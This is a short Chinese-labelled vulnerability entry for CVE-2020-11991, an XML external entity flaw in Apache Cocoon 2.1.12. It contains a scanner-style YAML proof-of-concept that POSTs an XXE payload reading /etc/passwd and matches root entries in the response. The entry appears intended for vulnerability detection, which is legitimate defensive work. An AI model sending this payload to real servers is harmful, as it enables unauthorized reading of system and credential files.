漏洞描述
Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
CVE-2020-11991: Apache Cocoon 2.1.12 XML Injection
PoC代码[已公开]
id: CVE-2020-11991
info:
name: Apache Cocoon 2.1.12 XML Injection
author: pikpikcu
severity: high
description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
reference:
- https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b
- https://nvd.nist.gov/vuln/detail/CVE-2020-11991
- https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E
- http://wiki.peiqi.tech/wiki/webserver/Apache/Apache%20Cocoon%20XML%E6%B3%A8%E5%85%A5%20CVE-2020-11991.html
rules:
r0:
request:
method: POST
path: /v2/api/product/manger/getInfo
headers:
Content-Type: "text/xml"
body: |
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&ent;</lastName>
</userInfo>
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()